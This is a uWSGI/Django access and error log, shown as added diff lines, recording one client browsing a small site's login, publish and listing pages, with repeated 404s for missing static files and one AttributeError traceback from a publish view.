+[pid: 18965|app: 0|req: 31/57] 117.100.100.38 () {38 vars in 852 bytes} [Fri Jan 8 13:40:59 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3547 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 18965|app: 0|req: 32/58] 117.100.100.38 () {38 vars in 844 bytes} [Fri Jan 8 13:40:59 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3535 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 18965|app: 0|req: 33/59] 117.100.100.38 () {38 vars in 808 bytes} [Fri Jan 8 13:40:59 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3481 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 18965|app: 0|req: 34/60] 117.100.100.38 () {38 vars in 828 bytes} [Fri Jan 8 13:40:59 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3511 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 18965|app: 0|req: 35/61] 117.100.100.38 () {38 vars in 828 bytes} [Fri Jan 8 13:40:59 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3511 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 18965|app: 0|req: 36/62] 117.100.100.38 () {38 vars in 884 bytes} [Fri Jan 8 13:40:59 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3595 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/spinners.css
+[pid: 18965|app: 0|req: 37/63] 117.100.100.38 () {38 vars in 776 bytes} [Fri Jan 8 13:40:59 2021] GET /static/css/spinners.css => generated 3433 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/animate.css
+[pid: 18965|app: 0|req: 38/64] 117.100.100.38 () {38 vars in 774 bytes} [Fri Jan 8 13:40:59 2021] GET /static/css/animate.css => generated 3430 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css
+[pid: 18965|app: 0|req: 39/65] 117.100.100.38 () {38 vars in 840 bytes} [Fri Jan 8 13:41:05 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3529 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css
+[pid: 18965|app: 0|req: 40/66] 117.100.100.38 () {38 vars in 852 bytes} [Fri Jan 8 13:41:05 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3547 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css
+[pid: 18965|app: 0|req: 41/67] 117.100.100.38 () {38 vars in 844 bytes} [Fri Jan 8 13:41:05 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3535 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css
+[pid: 18965|app: 0|req: 42/68] 117.100.100.38 () {38 vars in 828 bytes} [Fri Jan 8 13:41:05 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3511 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/linea-icons/linea.css
+[pid: 18965|app: 0|req: 43/69] 117.100.100.38 () {38 vars in 808 bytes} [Fri Jan 8 13:41:05 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3481 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/themify-icons/themify-icons.css
+[pid: 18965|app: 0|req: 44/70] 117.100.100.38 () {38 vars in 828 bytes} [Fri Jan 8 13:41:05 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3511 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css
+[pid: 18965|app: 0|req: 45/71] 117.100.100.38 () {38 vars in 882 bytes} [Fri Jan 8 13:41:05 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3595 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/spinners.css
+[pid: 18965|app: 0|req: 46/72] 117.100.100.38 () {38 vars in 774 bytes} [Fri Jan 8 13:41:05 2021] GET /static/css/spinners.css => generated 3433 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /static/css/animate.css
+[pid: 18965|app: 0|req: 47/73] 117.100.100.38 () {38 vars in 772 bytes} [Fri Jan 8 13:41:05 2021] GET /static/css/animate.css => generated 3430 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 48/74] 117.100.100.38 () {38 vars in 757 bytes} [Fri Jan 8 13:41:08 2021] GET / => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+Not Found: /static/img/apple-touch-icon-114x114.png
+[pid: 18965|app: 0|req: 49/75] 117.100.100.38 () {38 vars in 783 bytes} [Fri Jan 8 13:41:09 2021] GET /static/img/apple-touch-icon-114x114.png => generated 3481 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Fri Jan 8 13:41:09 2021 - uwsgi_response_sendfile_do(): Broken pipe [core/writer.c line 655] during GET /static/img/favicon.ico (117.100.100.38)
+[pid: 18965|app: -1|req: -1/76] 117.100.100.38 () {38 vars in 749 bytes} [Fri Jan 8 13:41:09 2021] GET /static/img/favicon.ico => generated 0 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1)
+[pid: 18965|app: 0|req: 50/77] 117.100.100.38 () {48 vars in 942 bytes} [Fri Jan 8 13:41:20 2021] POST / => generated 27 bytes in 6 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 51/78] 117.100.100.38 () {40 vars in 808 bytes} [Fri Jan 8 13:41:20 2021] GET /home => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 174 bytes (1 switches on core 0)
+[pid: 18965|app: 0|req: 52/79] 117.100.100.38 () {40 vars in 810 bytes} [Fri Jan 8 13:41:21 2021] GET /home/ => generated 8157 bytes in 7 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 0)
+[pid: 18965|app: 0|req: 53/80] 117.100.100.38 () {42 vars in 841 bytes} [Fri Jan 8 13:41:24 2021] GET /home/ => generated 8157 bytes in 7 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 1)
+[pid: 18965|app: -1|req: -1/81] 117.100.100.38 () {42 vars in 845 bytes} [Fri Jan 8 13:41:24 2021] GET /static/js/jquery.flexslider.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 18965|app: -1|req: -1/82] 117.100.100.38 () {42 vars in 829 bytes} [Fri Jan 8 13:41:24 2021] GET /static/js/bootstrap.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 18965|app: -1|req: -1/83] 117.100.100.38 () {42 vars in 831 bytes} [Fri Jan 8 13:41:24 2021] GET /static/js/jquery.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 18965|app: -1|req: -1/84] 117.100.100.38 () {42 vars in 847 bytes} [Fri Jan 8 13:41:24 2021] GET /static/js/jquery.prettyPhoto.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 18965|app: -1|req: -1/85] 117.100.100.38 () {42 vars in 837 bytes} [Fri Jan 8 13:41:24 2021] GET /static/js/jquery.custom.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0)
+[pid: 18965|app: 0|req: 54/86] 117.100.100.38 () {40 vars in 815 bytes} [Fri Jan 8 13:41:25 2021] GET /login => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 175 bytes (1 switches on core 0)
+[pid: 18965|app: 0|req: 55/87] 117.100.100.38 () {40 vars in 817 bytes} [Fri Jan 8 13:41:25 2021] GET /login/ => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 18965|app: 0|req: 56/88] 117.100.100.38 () {48 vars in 960 bytes} [Fri Jan 8 13:41:33 2021] POST /login/ => generated 27 bytes in 6 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 0)
+[pid: 18965|app: 0|req: 57/89] 117.100.100.38 () {40 vars in 816 bytes} [Fri Jan 8 13:41:33 2021] GET /home/ => generated 8157 bytes in 7 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 58/90] 117.100.100.38 () {40 vars in 819 bytes} [Fri Jan 8 13:41:36 2021] GET /publish => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 177 bytes (1 switches on core 0)
+[pid: 18965|app: 0|req: 59/91] 117.100.100.38 () {40 vars in 821 bytes} [Fri Jan 8 13:41:36 2021] GET /publish/ => generated 4909 bytes in 3 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 18965|app: -1|req: -1/92] 117.100.100.38 () {38 vars in 787 bytes} [Fri Jan 8 13:41:37 2021] GET /static/img/back-top-btn.png => generated 1790 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1)
+fdsfds 33
+Internal Server Error: /publish/
+Traceback (most recent call last):
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 181, in _get_response
+ response = wrapped_callback(request, *callback_args, **callback_kwargs)
+ File "./app01/views.py", line 203, in publish
+ t_photo_path = 'static/img/t_photo/' + str(t_id) + '_' + t_photo.name
+AttributeError: 'NoneType' object has no attribute 'name'
+[pid: 18965|app: 0|req: 60/93] 117.100.100.38 () {46 vars in 988 bytes} [Fri Jan 8 13:41:45 2021] POST /publish/ => generated 56678 bytes in 39 msecs (HTTP/1.1 500) 6 headers in 186 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 61/94] 117.100.100.38 () {40 vars in 822 bytes} [Fri Jan 8 13:41:52 2021] GET /publish/ => generated 4909 bytes in 4 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+fdsfds 33
+[pid: 18965|app: 0|req: 62/95] 117.100.100.38 () {46 vars in 992 bytes} [Fri Jan 8 13:42:06 2021] POST /publish/ => generated 0 bytes in 231 msecs (HTTP/1.1 302) 7 headers in 202 bytes (15 switches on core 1)
+[pid: 18965|app: 0|req: 63/96] 117.100.100.38 () {40 vars in 825 bytes} [Fri Jan 8 13:42:06 2021] GET /single/6 => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 178 bytes (1 switches on core 0)
+[pid: 18965|app: 0|req: 64/97] 117.100.100.38 () {40 vars in 827 bytes} [Fri Jan 8 13:42:06 2021] GET /single/6/ => generated 8267 bytes in 7 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 18965|app: -1|req: -1/98] 117.100.100.38 () {38 vars in 764 bytes} [Fri Jan 8 13:42:07 2021] GET /static/js/jquery.easing.1.3.js => generated 8097 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/99] 117.100.100.38 () {38 vars in 762 bytes} [Fri Jan 8 13:42:07 2021] GET /static/js/jquery.quicksand.js => generated 14697 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/100] 117.100.100.38 () {38 vars in 825 bytes} [Fri Jan 8 13:42:07 2021] GET /static/img/t_photo/6_%E9%80%89%E6%8B%A9%E5%99%A8%E6%9D%83%E9%87%8D.png => generated 65134 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+None
+[pid: 18965|app: 0|req: 65/101] 117.100.100.38 () {46 vars in 996 bytes} [Fri Jan 8 13:42:18 2021] POST /single/6/ => generated 0 bytes in 302 msecs (HTTP/1.1 302) 7 headers in 202 bytes (12 switches on core 1)
+[pid: 18965|app: 0|req: 66/102] 117.100.100.38 () {40 vars in 826 bytes} [Fri Jan 8 13:42:18 2021] GET /single/6 => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 178 bytes (1 switches on core 0)
+[pid: 18965|app: 0|req: 67/103] 117.100.100.38 () {40 vars in 828 bytes} [Fri Jan 8 13:42:18 2021] GET /single/6/ => generated 8830 bytes in 6 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 18965|app: -1|req: -1/104] 117.100.100.38 () {38 vars in 873 bytes} [Fri Jan 8 13:42:19 2021] GET /static/img/r_photo/3_%E6%96%87%E6%9C%AC%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%B8%B8%E7%94%A8%E6%A0%87%E7%AD%BE.png => generated 110927 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/105] 117.100.100.38 () {40 vars in 880 bytes} [Fri Jan 8 13:42:19 2021] GET /static/img/t_photo/6_%E9%80%89%E6%8B%A9%E5%99%A8%E6%9D%83%E9%87%8D.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1)
+[pid: 18965|app: 0|req: 68/106] 117.100.100.38 () {40 vars in 826 bytes} [Fri Jan 8 13:42:23 2021] GET /publish/ => generated 4909 bytes in 3 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+0
+0
+[, ]
+[pid: 18965|app: 0|req: 69/107] 117.100.100.38 () {40 vars in 828 bytes} [Fri Jan 8 13:42:27 2021] GET /all-2-0-0 => generated 9158 bytes in 9 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+Not Found: /None
+[pid: 18965|app: 0|req: 70/108] 117.100.100.38 () {38 vars in 723 bytes} [Fri Jan 8 13:42:27 2021] GET /None => generated 3376 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+[pid: 18965|app: -1|req: -1/109] 117.100.100.38 () {38 vars in 767 bytes} [Fri Jan 8 13:42:27 2021] GET /static/img/t_photo/4_2.png => generated 88960 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+Not Found: /None
+[pid: 18965|app: 0|req: 71/110] 117.100.100.38 () {38 vars in 723 bytes} [Fri Jan 8 13:42:27 2021] GET /None => generated 3376 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 72/111] 117.100.100.38 () {40 vars in 826 bytes} [Fri Jan 8 13:42:31 2021] GET /publish/ => generated 4909 bytes in 3 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 73/112] 117.100.100.38 () {40 vars in 1365 bytes} [Fri Jan 8 13:44:11 2021] GET /home/ => generated 7795 bytes in 7 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 0)
+[pid: 18965|app: 0|req: 74/113] 117.100.100.38 () {40 vars in 1365 bytes} [Fri Jan 8 13:44:11 2021] GET /home/ => generated 7795 bytes in 6 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 75/114] 117.100.100.38 () {40 vars in 1387 bytes} [Fri Jan 8 13:44:12 2021] GET /publish/ => generated 4909 bytes in 3 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 18965|app: 0|req: 76/115] 117.100.100.38 () {40 vars in 1389 bytes} [Fri Jan 8 13:44:16 2021] GET /all-0-0-0 => generated 10471 bytes in 8 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0)
+[pid: 18965|app: -1|req: -1/116] 117.100.100.38 () {38 vars in 1283 bytes} [Fri Jan 8 13:44:16 2021] GET /static/js/jquery.quicksand.js => generated 14697 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+Not Found: /static/img/t_photo/1_2.png
+[pid: 18965|app: 0|req: 77/117] 117.100.100.38 () {38 vars in 1313 bytes} [Fri Jan 8 13:44:17 2021] GET /static/img/t_photo/1_2.png => generated 3442 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /None
+[pid: 18965|app: 0|req: 78/118] 117.100.100.38 () {38 vars in 1269 bytes} [Fri Jan 8 13:44:17 2021] GET /None => generated 3376 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+[pid: 18965|app: -1|req: -1/119] 117.100.100.38 () {40 vars in 1368 bytes} [Fri Jan 8 13:44:17 2021] GET /static/img/t_photo/4_2.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1)
+[pid: 18965|app: -1|req: -1/120] 117.100.100.38 () {38 vars in 1371 bytes} [Fri Jan 8 13:44:17 2021] GET /static/img/t_photo/6_%E9%80%89%E6%8B%A9%E5%99%A8%E6%9D%83%E9%87%8D.png => generated 65134 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+0
+0
+[, ]
+[pid: 18965|app: 0|req: 79/121] 117.100.100.38 () {40 vars in 1393 bytes} [Fri Jan 8 13:44:20 2021] GET /all-2-0-0 => generated 9102 bytes in 10 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+Not Found: /None
+[pid: 18965|app: 0|req: 80/122] 117.100.100.38 () {38 vars in 1269 bytes} [Fri Jan 8 13:44:20 2021] GET /None => generated 3376 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+0
+0
+[, ]
+[pid: 18965|app: 0|req: 81/123] 117.100.100.38 () {40 vars in 1393 bytes} [Fri Jan 8 13:44:21 2021] GET /all-3-0-0 => generated 9110 bytes in 9 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+Not Found: /None
+[pid: 18965|app: 0|req: 82/124] 117.100.100.38 () {38 vars in 1269 bytes} [Fri Jan 8 13:44:21 2021] GET /None => generated 3376 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+[]
+[pid: 18965|app: 0|req: 83/125] 117.100.100.38 () {40 vars in 1393 bytes} [Fri Jan 8 13:44:22 2021] GET /all-4-0-0 => generated 8417 bytes in 8 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+0
+0
+[, ]
+[pid: 18965|app: 0|req: 84/126] 117.100.100.38 () {40 vars in 1393 bytes} [Fri Jan 8 13:44:22 2021] GET /all-2-0-0 => generated 9102 bytes in 9 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+Not Found: /None
+[pid: 18965|app: 0|req: 85/127] 117.100.100.38 () {38 vars in 1269 bytes} [Fri Jan 8 13:44:23 2021] GET /None => generated 3376 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+0
+0
+[, ]
+[pid: 18965|app: 0|req: 86/128] 117.100.100.38 () {40 vars in 1393 bytes} [Fri Jan 8 13:44:24 2021] GET /all-1-0-0 => generated 9093 bytes in 9 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+0
+0
+[, ]
+[pid: 18965|app: 0|req: 87/129] 117.100.100.38 () {40 vars in 1393 bytes} [Fri Jan 8 13:44:25 2021] GET /all-1-0-0 => generated 9093 bytes in 9 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+Not Found: /static/img/t_photo/1_2.png
+[pid: 18965|app: 0|req: 88/130] 117.100.100.38 () {38 vars in 1313 bytes} [Fri Jan 8 13:44:25 2021] GET /static/img/t_photo/1_2.png => generated 3442 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /None
+[pid: 18965|app: 0|req: 89/131] 117.100.100.38 () {38 vars in 1269 bytes} [Fri Jan 8 13:44:25 2021] GET /None => generated 3376 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+[pid: 18965|app: 0|req: 90/132] 117.100.100.38 () {40 vars in 1393 bytes} [Fri Jan 8 13:44:27 2021] GET /all-0-0-0 => generated 10471 bytes in 9 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1)
+Not Found: /static/img/t_photo/1_2.png
+[pid: 18965|app: 0|req: 91/133] 117.100.100.38 () {38 vars in 1313 bytes} [Fri Jan 8 13:44:27 2021] GET /static/img/t_photo/1_2.png => generated 3442 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /None
+[pid: 18965|app: 0|req: 92/134] 117.100.100.38 () {38 vars in 1269 bytes} [Fri Jan 8 13:44:27 2021] GET /None => generated 3376 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+[pid: 18965|app: 0|req: 93/135] 117.100.100.38 () {40 vars in 1393 bytes} [Fri Jan 8 13:44:28 2021] GET /all-0-0-0 => generated 10471 bytes in 7 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0)
+Not Found: /static/img/t_photo/1_2.png
+[pid: 18965|app: 0|req: 94/136] 117.100.100.38 () {38 vars in 1313 bytes} [Fri Jan 8 13:44:28 2021] GET /static/img/t_photo/1_2.png => generated 3442 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /None
+[pid: 18965|app: 0|req: 95/137] 117.100.100.38 () {38 vars in 1269 bytes} [Fri Jan 8 13:44:28 2021] GET /None => generated 3376 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+0
+0
+[, ]
+[pid: 18965|app: 0|req: 96/138] 117.100.100.38 () {40 vars in 1393 bytes} [Fri Jan 8 13:44:29 2021] GET /all-1-0-0 => generated 9093 bytes in 9 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+Not Found: /static/img/t_photo/1_2.png
+[pid: 18965|app: 0|req: 97/139] 117.100.100.38 () {38 vars in 1313 bytes} [Fri Jan 8 13:44:29 2021] GET /static/img/t_photo/1_2.png => generated 3442 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /None
+[pid: 18965|app: 0|req: 98/140] 117.100.100.38 () {38 vars in 1269 bytes} [Fri Jan 8 13:44:29 2021] GET /None => generated 3376 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+0
+0
+[, ]
+[pid: 18965|app: 0|req: 99/141] 117.100.100.38 () {40 vars in 1393 bytes} [Fri Jan 8 13:44:37 2021] GET /all-1-0-0 => generated 9093 bytes in 9 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+Not Found: /static/img/t_photo/1_2.png
+[pid: 18965|app: 0|req: 100/142] 117.100.100.38 () {38 vars in 1313 bytes} [Fri Jan 8 13:44:37 2021] GET /static/img/t_photo/1_2.png => generated 3442 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+Not Found: /None
+[pid: 18965|app: 0|req: 101/143] 117.100.100.38 () {38 vars in 1269 bytes} [Fri Jan 8 13:44:37 2021] GET /None => generated 3376 bytes in 3 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+0
+0
+[, ]
+[pid: 18965|app: 0|req: 102/144] 117.100.100.38 () {40 vars in 1393 bytes} [Fri Jan 8 13:44:38 2021] GET /all-2-0-0 => generated 9102 bytes in 10 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+Not Found: /None
+[pid: 18965|app: 0|req: 103/145] 117.100.100.38 () {38 vars in 1269 bytes} [Fri Jan 8 13:44:38 2021] GET /None => generated 3376 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+0
+0
+[, ]
+[pid: 18965|app: 0|req: 104/146] 117.100.100.38 () {40 vars in 1393 bytes} [Fri Jan 8 13:44:38 2021] GET /all-3-0-0 => generated 9110 bytes in 11 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+Not Found: /None
+[pid: 18965|app: 0|req: 105/147] 117.100.100.38 () {38 vars in 1269 bytes} [Fri Jan 8 13:44:38 2021] GET /None => generated 3376 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+[pid: 18965|app: -1|req: -1/148] 117.100.100.38 () {40 vars in 1426 bytes} [Fri Jan 8 13:44:38 2021] GET /static/img/t_photo/6_%E9%80%89%E6%8B%A9%E5%99%A8%E6%9D%83%E9%87%8D.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1)
+0
+0
+[, ]
+[pid: 18965|app: 0|req: 106/149] 117.100.100.38 () {40 vars in 828 bytes} [Fri Jan 8 13:44:41 2021] GET /all-1-0-0 => generated 9149 bytes in 9 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+Not Found: /static/img/t_photo/1_2.png
+[pid: 18965|app: 0|req: 107/150] 117.100.100.38 () {38 vars in 767 bytes} [Fri Jan 8 13:44:41 2021] GET /static/img/t_photo/1_2.png => generated 3442 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Not Found: /None
+[pid: 18965|app: 0|req: 108/151] 117.100.100.38 () {38 vars in 723 bytes} [Fri Jan 8 13:44:42 2021] GET /None => generated 3376 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+0
+0
+[, ]
+[pid: 18965|app: 0|req: 109/152] 117.100.100.38 () {40 vars in 826 bytes} [Fri Jan 8 13:44:42 2021] GET /all-2-0-0 => generated 9158 bytes in 9 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+Not Found: /None
+[pid: 18965|app: 0|req: 110/153] 117.100.100.38 () {38 vars in 721 bytes} [Fri Jan 8 13:44:43 2021] GET /None => generated 3376 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+[pid: 18965|app: -1|req: -1/154] 117.100.100.38 () {40 vars in 820 bytes} [Fri Jan 8 13:44:43 2021] GET /static/img/t_photo/4_2.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1)
+Not Found: /None
+[pid: 18965|app: 0|req: 111/155] 117.100.100.38 () {38 vars in 722 bytes} [Fri Jan 8 13:44:43 2021] GET /None => generated 3376 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1)
+0
+0
+[, ]
+[pid: 18965|app: 0|req: 112/156] 117.100.100.38 () {40 vars in 827 bytes} [Fri Jan 8 13:44:43 2021] GET /all-3-0-0 => generated 9166 bytes in 9 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+Not Found: /None
+[pid: 18965|app: 0|req: 113/157] 117.100.100.38 () {38 vars in 722 bytes} [Fri Jan 8 13:44:43 2021] GET /None => generated 3376 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+[pid: 18965|app: -1|req: -1/158] 117.100.100.38 () {38 vars in 824 bytes} [Fri Jan 8 13:44:44 2021] GET /static/img/t_photo/6_%E9%80%89%E6%8B%A9%E5%99%A8%E6%9D%83%E9%87%8D.png => generated 65134 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0)
+Not Found: /None
+[pid: 18965|app: 0|req: 114/159] 117.100.100.38 () {38 vars in 722 bytes} [Fri Jan 8 13:44:44 2021] GET /None => generated 3376 bytes in 4 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+[pid: 18965|app: 0|req: 115/160] 117.100.100.38 () {40 vars in 827 bytes} [Fri Jan 8 13:44:45 2021] GET /all-0-0-0 => generated 10527 bytes in 8 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0)
+Not Found: /static/img/t_photo/1_2.png
